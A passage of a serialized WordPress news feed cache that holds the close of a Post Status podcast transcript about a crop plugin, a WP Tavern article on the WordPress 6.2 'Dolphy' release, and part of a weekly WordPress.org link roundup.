Yeah. But mm-hmm. this or, you know, reactions like, what, what<br />we need. So, um, let me do that with the Robbie, Kathy, aunt Cadence and then, um, ping, ping<br />the team over at on Mentor.<br />Corey Maass: Yeah, and honestly like think about, so I, I think one of the things that you could<br />be doing. Is, or, or what you are doing, but [00:55:00] do more of, is this kind of, essentially, it&#8217;s<br />not really a custom inter customer interview, but kind of, sort of, yeah, yeah. Um, so like, you<br />know, put it on your Twitter or look for a way to, to elevate that question in post status or, and I,<br />I&#8217;m not sure what the question is, but I, I kind of want to put that, put that on your plate.<br />Let me keep focusing on the development of, of the first version of the plugin. Um, but if you can<br />be having starting, or, I mean, and, and usually, you know, tweet into the void and maybe<br />nobody comes back, but it&#8217;s the, like, you know, how, how do you, how do you find images or<br />like, that&#8217;s not the problem we&#8217;re solving yet, so I don&#8217;t wanna really ask that question yet.<br />But, you know, how, what problem, how painful do you, yeah. You know, is it, do you, do you,<br />you know, either define the problem, you know, do you have, do you wish that there was a<br />better crop in WordPress? Or what apps [00:56:00] do you use to manipulate a photo before<br />you upload it to your blog post? Or, um, you know, I think there&#8217;s, I think there&#8217;s, you asked a<br />couple of questions to help figure out the right question to ask and then start asking that in more<br />places.<br />Um, okay. Cuz that, that&#8217;ll. I think it&#8217;s, you know, you pinging the specific people is huge. Um,<br />especially tapping into if, if they are a, a essentially a gateway into, uh, a community or a, a<br />team that is facing a problem over and over again. But I would, I&#8217;d love to hear some, like,<br />answers in the wild too of like throw it on Twitter and see if, if people.<br />Have a response, you know? Um, yeah, because like you said, there&#8217;s, I, I do feel like we are<br />looking for a spark. Like I have this other, um, app, you know, a p i service that I built a while<br />ago that I want to talk to you some other time [00:57:00] about offline. Um, But it&#8217;s like I, and, uh,<br />well, I&#8217;ve mentioned a couple times.<br />I, I built it 99% of the way and then stopped and have not opened it up because I&#8217;m like, I&#8217;m just<br />missing that spark. Like the, and, and then just today somebody, it, it pertains to screenshots.<br />And so somebody today was like, oh, is there a WordPress plugin that takes this kind of<br />screenshot? And I was like, oh my God, I never even thought of that.<br />And I don&#8217;t, I don&#8217;t, still don&#8217;t know if it&#8217;s the spark, but I&#8217;m, you know, I&#8217;m pulling at that thread. I<br />messaged the guy and then we&#8217;re. We&#8217;re chatting via email, like I might bang together a quick<br />use case for &#8217;em to like see if that&#8217;s part of the spark. You know what I mean? So<br />Cory Miller: I, I would love to talk about that.<br />Cause you&#8217;ve mentioned it in our other discussions. I&#8217;d love to talk about that more because, I<br />mean, I think there&#8217;s one thing that I&#8217;m really interested in. It&#8217;s like images and they mentioned<br />Yeah, exactly. No, being able to do that and like, I love the, I think it was a screen. Tool<br />potentially you were talking about?<br />Um, yeah. [00:58:00] Or in that realm. And Yeah. And it makes me put, like, higher on my list is<br />the OMG IMG site as our base for Yeah. Being able to explore this. Here&#8217;s your free plug into<br />crop, you know, like that sticker mill thing. Like here&#8217;s your total mm-hmm. ,<br />Corey Maass: which by, by the way, Sticker Mule, they have, um, specials once in a while.</p>\n\n\n\n<p>So I ordered us, um, 10 crop express stickers for a dollar. So we have our first swag, so as it, it<br />has shipped. So I need your, I need your address. Yep. And, uh, uh, I&#8217;ll send you five. And then<br />we each have five crop express plugin or, um, plugin stickers for, for the fun of it. .<br />Cory Miller: I, I want an OMG IMG Hoodie<br />Corey Maass: oh yes. . Yes.<br />And that, that logo, we&#8217;re gonna need to spend a little more time on roughly. So, yeah,<br />[00:59:00] I want, I want rainbows and unicorns or something. I don&#8217;t know yet. Ice cream<br />cones, but hey brother, I could keep<br />Cory Miller: talking, but I know you need to jet.<br />Corey Maass: Yeah, I gotta bounce.<br />Cory Miller: All right. Uh, I&#8217;m pumped. Thanks, man.<br />Corey Maass: Yeah, we&#8217;ll talk soon.</p>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 30 Mar 2023 13:34:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Cory Miller\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:131:\"WPTavern: WordPress 6.2 “Dolphy” Introduces a Revamped Site Editor, Distraction-Free Writing Mode, and Updated Block Inserter \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143114\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:132:\"https://wptavern.com/wordpress-6-2-dolphy-introduces-a-revamped-site-editor-distraction-free-writing-mode-and-updated-block-inserter\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4550:\"<img />image credit: <a href=\"https://www.youtube.com/watch?v=vAn_gyNcvN4\">Charles Mingus Sextet &#8211; Feat. Eric Dolphy &#8211; Take The A Train</a>\n\n\n\n<p><a href=\"https://wordpress.org/news/2023/03/dolphy/\">WordPress 6.2</a> &#8220;Dolphy&#8221; was released today, named in honor of American jazz alto saxophonist, bass clarinetist, and flautist <a href=\"https://en.wikipedia.org/wiki/Eric_Dolphy\">Eric Allan Dolphy Jr</a>.&nbsp;This is the first of three planned major releases in 2023. It includes more than 900 enhancements and bug fixes, with a strong focus on improving the site editing experience.</p>\n\n\n\n<p>One of the major highlights of the 6.2 release is the completely revamped Site Editor interface. The browse mode style of navigation lets users quickly slide between editing and previews of templates and template parts, with a new unified design that makes it feel like it&#8217;s all part of the same application. </p>\n\n\n\n<p>Color-coded labels have been added in 6.2, which give users more visual cues in finding their template parts and reusable blocks inside the List View, the Block toolbar, and on the Canvas.</p>\n\n\n\n<p>With these and other updates, the Site Editor is now out of beta. Inside the admin, the About page includes beautifully designed screenshots of each feature with the vibrant blue color that has become part of WordPress&#8217; identity in the new design that is slowly being rolled out across WordPress.org.</p>\n\n\n\n<img />WordPress 6.2 About page\n\n\n\n<p>For those switching from a Classic theme to a Block theme, widgets that are imported will now automatically become Template Parts to make it an easier transition.</p>\n\n\n\n<h3 class=\"wp-block-heading\">Improved Navigation Block Experience for Managing Menus</h3>\n\n\n\n<p>Managing Navigation menus just got easier with a new sidebar inside the Site Editor that allows users to quickly add, remove, and reorder menu items.</p>\n\n\n\n<img />WordPress 6.2 About page\n\n\n\n<h3 class=\"wp-block-heading\">Updated Block Inserter with Media Tab and Openverse Integration</h3>\n\n\n\n<p>The Block Inserter is sporting a new design that better integrates media, making it faster to insert images, video, and audio, with a new tab alongside blocks and patterns. Users can select the new tab and select a media type to see the ten most recent items. </p>\n\n\n\n<img />\n\n\n\n<p>WordPress 6.2 also adds integration with <a href=\"https://openverse.org/\">Openverse</a> to this new media tab. Users now have access to the Openverse library of more than 700 million free-to-use openly licensed and public domain works, directly inside the editor. Clicking on an Openverse image will instantly insert it as an Image block with the proper attribution and license automatically added to the caption, a much faster experience than downloading and uploading to the Media Library.</p>\n\n\n\n<img />\n\n\n\n<h3 class=\"wp-block-heading\">New Distraction-Free Writing Mode</h3>\n\n\n\n<p>WordPress 6.2 introduces a distraction-free writing mode that offers a more focused writing experience, hiding unnecessary interface elements from the editor. This video from the 6.2 testing guide shows how it can be enabled and disabled.</p>\n\n\n\nvideo credit: <a href=\"https://make.wordpress.org/test/2023/02/07/help-test-wordpress-6-2/\">WordPress 6.2 Testing Guide</a>\n\n\n\n<p>Other notable features and updates in 6.2 include the following:</p>\n\n\n\n<ul>\n<li>&nbsp;A new collection of header and footer patterns for block themes</li>\n\n\n\n<li>Scaled block settings with split controls to better organize Styles and Settings options</li>\n\n\n\n<li>A new Style Book that displays every block in the site’s library at a glance where they can be previewed and edited globally</li>\n\n\n\n<li>Copy and Paste styles between blocks</li>\n\n\n\n<li>Improved pattern insertion with patterns organized into more categories, like headers and footers</li>\n\n\n\n<li>Custom CSS support sitewide and for specific blocks</li>\n\n\n\n<li>Sticky positioning to keep top-level group blocks fixed to the top of a page as visitors scroll</li>\n\n\n\n<li>Improved privacy for default themes with locally hosted Google Fonts</li>\n</ul>\n\n\n\n<p>WordPress 6.2 was made possible by more than 600 contributors across 50 countries, with 178 of those contributing for the first time. Update today to get access to all these new features and bug fixes. For the most comprehensive coverage of all the under-the-hood changes for developers and extenders, check out the <a href=\"https://make.wordpress.org/core/2023/03/09/wordpress-6-2-field-guide/\">WordPress 6.2 Field Guide</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Mar 2023 20:35:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"Post Status: WordPress 6.2 “Dolphy” • Gutenberg Phase 3 • Test Plugin Dependencies\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=148557\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"https://poststatus.com/wordpress-6-2-dolphy-gutenberg-phase-3-test-plugin-dependencies/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:21940:\"<h2 class=\"wp-block-heading\" id=\"h-this-week-at-wordpress-org-march-27-2023\">This Week at WordPress.org (March 27, 2023)</h2>\n\n\n<div class=\"has-background has-theme-palette-8-background-color wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\"><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f973.png\" alt=\"🥳\" class=\"wp-smiley\" /> WordPress 6.2 is now available! If you haven&#8217;t started testing yet, now is the time. <br /><br />Gutenberg is a 4 phase approach to nearly all areas of WordPress. Phase 1 was Posts and Pages. Phase 2 included Themes. Matias Ventura shares what we could see in Phase 3.  <br /><br />Andy Fragen has posted a call for testing on the Plugin Dependencies plugin. </p></div>\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<div class=\"wp-block-kadence-infobox kt-info-box_94d1bd-77\"><div class=\"kt-blocks-info-box-link-wrap kt-blocks-info-box-media-align-left kt-info-halign-left\"><div class=\"kt-blocks-info-box-media-container\"><div class=\"kt-blocks-info-box-media kt-info-media-animate-none\"><div class=\"kadence-info-box-icon-container kt-info-icon-animate-none\"><div class=\"kadence-info-box-icon-inner-container\"><span class=\"kb-svg-icon-wrap kb-svg-icon-fas_rocket kt-info-svg-icon\"></span></div></div></div></div><div class=\"kt-infobox-textcontent\"><h2 class=\"kt-blocks-info-box-title\">WP 6.2, Plugin Dependencies, Phase 3</h2><p class=\"kt-blocks-info-box-text\"><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f680.png\" alt=\"🚀\" class=\"wp-smiley\" /> <a href=\"https://wordpress.org/news/2023/03/dolphy/\">WordPress 6.2 “Dolphy”</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f5a5.png\" alt=\"🖥\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/core/2023/03/28/call-for-testing-plugin-dependencies-ux/\">Call for Testing: Plugin Dependencies UX</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f7e6.png\" alt=\"🟦\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/core/2023/03/30/proposal-the-interactivity-api-a-better-developer-experience-in-building-interactive-blocks/\">Proposal: The Interactivity API – A better developer experience in building interactive blocks</a><br /><br />3&#x20e3; <a href=\"https://make.wordpress.org/core/2023/03/24/phase-3-collaboration/\">Phase 3: Collaboration</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f3b7.png\" alt=\"🎷\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/design/2023/03/30/why-jazz/\">Why Jazz?</a></p></div></div></div>\n\n\n\n<div class=\"wp-block-kadence-spacer aligncenter kt-block-spacer-_b57166-6e\"><div class=\"kt-block-spacer kt-block-spacer-halign-center\"><hr class=\"kt-divider\" /></div></div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-news\"><a href=\"https://wordpress.org/news\">News</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://wordpress.org/news/2023/03/episode-52-phase-three-with-hector-prieto/\">WP Briefing: Episode 52: Workflows and Phase Three Visioning with Special Guest Héctor Prieto</a></li>\n\n\n\n<li><a href=\"https://wp20.wordpress.net/wp20-swag-is-here/\">WP20 Swag is Here! Order Your Official Merchandise Today</a></li>\n</ul>\n\n\n\n<div class=\"wp-block-kadence-spacer aligncenter kt-block-spacer-_8f6276-eb\"><div class=\"kt-block-spacer kt-block-spacer-halign-center\"><hr class=\"kt-divider\" /></div></div>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-12\">\n<div class=\"wp-block-column is-layout-flow\">\n<h2 class=\"wp-block-heading\" id=\"h-community\"><a href=\"https://make.wordpress.org/community\">Community</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/community/2023/03/30/community-team-goals-for-2023-2nd-chat-session/\">Community Team Goals for 2023 : 2nd Chat session</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-core\"><a href=\"https://make.wordpress.org/core\">Core</a> </h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/03/30/proposal-the-interactivity-api-a-better-developer-experience-in-building-interactive-blocks/\">Proposal: The Interactivity API – A better developer experience in building interactive blocks</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/28/call-for-testing-plugin-dependencies-ux/\">Call for Testing: Plugin Dependencies UX</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/28/introducing-a-new-block-editor-handbook-scrub/\">Introducing a new block editor handbook scrub</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/23/wordpress-6-2-release-day-process/\">WordPress 6.2 Release Day Process</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-wordpress-6-2\">WordPress 6.2</h3>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/03/28/wordpress-6-2-release-date-updated-march-29-2023/\">WordPress 6.2 release date updated: March 29, 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/23/wordpress-6-2-release-day-process/\">WordPress 6.2 Release Day Process</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/23/wordpress-6-2-release-candidate-4/\">WordPress 6.2 Release Candidate 4</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/14/fyi-navigation-section-of-new-site-editor-experienced-removed-for-6-2-rc-2/\">FYI: Navigation section of new Site Editor experienced removed for 6.2 RC 2</a></li>\n\n\n\n<li><a href=\"https://wordpress.org/news/2023/03/wordpress-6-2-release-candidate-1/\">WordPress 6.2 Release Candidate 1</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/polyglots/2023/03/14/wordpress-6-2-translation-status-march-14-2023/\">WordPress 6.2 Translation Status (March 14, 2023)</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/polyglots/2023/03/04/wordpress-6-2-ready-to-be-translated/\">WordPress 6.2 ready to be translated</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/09/wordpress-6-2-field-guide/\">WordPress 6.2 Field Guide</a>\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/03/08/requests-library-upgraded-to-2-0-5-in-wordpress-6-2/\">Requests library upgraded to 2.0.5 in WordPress 6.2</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/07/patterns-api-expanded-to-include-template_types-property/\">Patterns API expanded to include template_types property</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/07/introduction-of-block-inspector-tabs/\">Introduction of Block Inspector Tabs</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/07/shadows-in-global-styles-with-wordpress-6-2/\">Shadows in Global Styles with WordPress 6.2</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/07/introducing-the-html-api-in-wordpress-6-2/\">Introducing the HTML API in WordPress 6.2</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/07/miscellaneous-editor-changes-in-wordpress-6-2/\">Miscellaneous Editor changes in WordPress 6.2</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/07/introducing-move_dir-in-wordpress-6-2/\">Introducing move_dir() in WordPress 6.2</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/07/sticky-position-block-support/\">Sticky position block support</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/07/upgrading-to-react-18-and-common-pitfalls-of-concurrent-mode/\">Upgrading to React 18 and common pitfalls of concurrent mode</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/06/add-new-prop-to-serversiderender-component/\">Add new prop to ServerSideRender component</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/06/google-fonts-are-included-locally-in-bundled-themes/\">Google Fonts are included locally in bundled themes</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/06/custom-css-for-global-styles-and-per-block/\">Custom CSS for global styles and per block</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/06/minimum-height-dimensions-block-support/\">Minimum height dimensions block support</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/03/editor-components-updates-in-wordpress-6-2/\">Editor Components updates in WordPress 6.2</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/03/i18n-improvements-in-6-2/\">I18N Improvements in 6.2</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/02/28/custom-settings-wordpress-6-2/\">Customize settings for any block in WordPress 6.2</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/02/19/style-book-preview-of-blocks-in-global-styles/\">Style Book preview of blocks in global styles</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/12/09/update-to-content-only-editing-filter-namespace/\">Update to content only editing filter namespace</a></li>\n</ul>\n</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/02/wordpress-6-2-accessibility-improvements/\">WordPress 6.2 Accessibility Improvements</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/02/28/wordpress-6-2-beta-4-postponed/\">WordPress 6.2 Beta 4 Postponed</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/02/21/wordpress-6-2-beta-3/\">WordPress 6.2 Beta 3</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/02/21/6-2-live-product-demo/\">6.2 Live Product Demo</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/02/04/phase-2-finale/\">Phase 2, Finale</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/02/03/hallway-hangout-performance-improvements-for-wordpress-6-2/\">Hallway Hangout: Performance Improvements for WordPress 6.2</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/02/06/roadmap-to-6-2/\">Roadmap to 6.2</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/01/18/bug-scrub-schedule-for-6-2/\">Bug Scrub Schedule for 6.2</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/01/11/early-bug-scrub-schedule-for-wp-6-2/\">Early bug scrub schedule for WP&nbsp;6.2</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/01/17/wordpress-6-2-planning-roundup/\">WordPress 6.2 Planning Roundup</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-meetings\">Meetings</h3>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/03/30/core-editor-chat-summary-29th-march-2023/\">Core Editor chat summary: 29th March 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/28/march-29-dev-chat-is-canceled-in-favor-of-wordpress-6-2-final-release-party/\">March 29 Dev Chat is canceled in favor of WordPress 6.2 final release party</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/27/editor-chat-summary-march-22nd-2023/\">Editor chat summary: March 22nd, 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/27/editor-chat-agenda-march-29th-2023/\">Editor Chat Agenda: March 29th 2023</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-developer-blog\">Developer Blog</h3>\n\n\n\n<ul>\n<li><a href=\"https://developer.wordpress.org/news/2023/03/quick-and-easy-local-wordpress-development-with-wp-env/\">Quick and easy local WordPress development with wp-env</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-design\"><a href=\"https://make.wordpress.org/design\">Design</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/design/2023/03/30/why-jazz/\">Why Jazz?</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/design/2023/03/13/design-share-feb-13-mar-10/\">Design Share: Feb 13–Mar 10</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-docs\"><a href=\"https://make.wordpress.org/docs\">Docs</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/docs/2023/03/26/agenda-for-docs-team-bi-weekly-meeting-april-4-2023/\">Agenda for Docs Team bi-weekly meeting April 4, 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/docs/2023/03/26/summary-for-docs-team-meeting-march-21-2023/\">Summary for Docs Team meeting, March 21, 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/docs/2023/03/15/call-for-volunteers-to-help-with-6-2-end-user-documentation/\">Call for volunteers to help with 6.2 end user documentation</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/03/27/documentation-team-update-march-27-2023/\">Documentation Team Update – March 27, 2023</a></li>\n</ul>\n</div>\n\n\n\n<div class=\"wp-block-column is-layout-flow\">\n<h2 class=\"wp-block-heading\" id=\"h-hosting\"><a href=\"https://make.wordpress.org/hosting\">Hosting</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/hosting/2023/03/21/hosting-team-meeting-agenda-2023-03-22/\">Hosting Team meeting agenda 2023-03-22</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-marketing\"><a href=\"https://make.wordpress.org/marketing\">Marketing</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/marketing/2023/03/28/notes-global-marketing-team-meeting-21-march-2023/\">Notes: Global Marketing Team meeting, 21 March 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-meta\"><a href=\"https://make.wordpress.org/meta\">Meta</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/meta/2023/03/27/matrix-chat-summary-march-23-2023/\">Matrix chat Summary, March 23 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-mobile\"><a href=\"https://make.wordpress.org/mobile\">Mobile</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/mobile/2023/03/28/new-mobile-support-forum/\">New Mobile Support Forum</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/03/25/mobile-team-update-march-25th/\">Mobile Team Update – March 25th</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-openverse\"><a href=\"https://make.wordpress.org/openverse\">Openverse</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/openverse/2023/03/27/last-week-openverse-2023-03-20-2023-03-27/\">A week in Openverse: 2023-03-20 – 2023-03-27</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-performance\"><a href=\"https://make.wordpress.org/performance/\">Performance</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/03/28/performance-chat-summary-28-march-2023/\">Performance Chat Summary: 28 March 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/03/27/core-performance-team-update-march-27-2023/\">Core Performance Team Update: March 27, 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-plugins\"><a href=\"https://make.wordpress.org/plugins\">Plugins</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/plugins/2023/03/10/advance-notice-of-retirement/\">Advance Notice of Retirement</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-polyglots\"><a href=\"https://make.wordpress.org/polyglots\">Polyglots</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/polyglots/2023/03/29/agenda-weekly-polyglots-chat-march-29-2023-1300-utc/\">Agenda: Weekly Polyglots Chat – March 29, 2023 (13:00 UTC)</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/polyglots/2023/03/21/new-translation-project-wp20-wordpress-net/\">New translation project: wp20.wordpress.net</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-plugins-1\"><a href=\"https://make.wordpress.org/plugins\">Plugins</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/plugins/2023/03/21/use-of-code-generators-must-remain-gpl-compatible/\">Use of Code Generators Must Remain GPL Compatible</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/plugins/2023/03/10/advance-notice-of-retirement/\">Advance Notice of Retirement</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/03/28/plugin-review-team-27-mar-2023/\">Plugin Review Team: 27 Mar 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-project\">Project</h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/project/2023/02/06/proposal-creating-a-wordpress-contributor-mentorship-program/\">Proposal: Creating a WordPress Contributor Mentorship Program</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/project/2023/01/27/discussion-ending-the-eternal-september/\">Discussion: Ending the Eternal September</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-support\"><a href=\"https://make.wordpress.org/support\">Support</a></h2>\n\n\n\n<ul>\n<li> </li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-test\"><a href=\"https://make.wordpress.org/test\">Test</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/test/2023/03/28/test-chat-summary-28-march-2023/\">Test Chat Summary: 28 March 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/test/2023/03/14/hallway-hangout-lets-chat-about-all-things-layout/\">Hallway Hangout: Let’s chat about All Things Layout</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/test/2023/02/07/help-test-wordpress-6-2/\">Help Test WordPress 6.2</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-theme\">Theme</h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/themes/2023/03/27/themes-team-meeting-agenda-for-march-28-2023/\">Themes team meeting agenda for March 28, 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/themes/2023/03/03/hallway-hangout-community-themes-initiative/\">Hallway 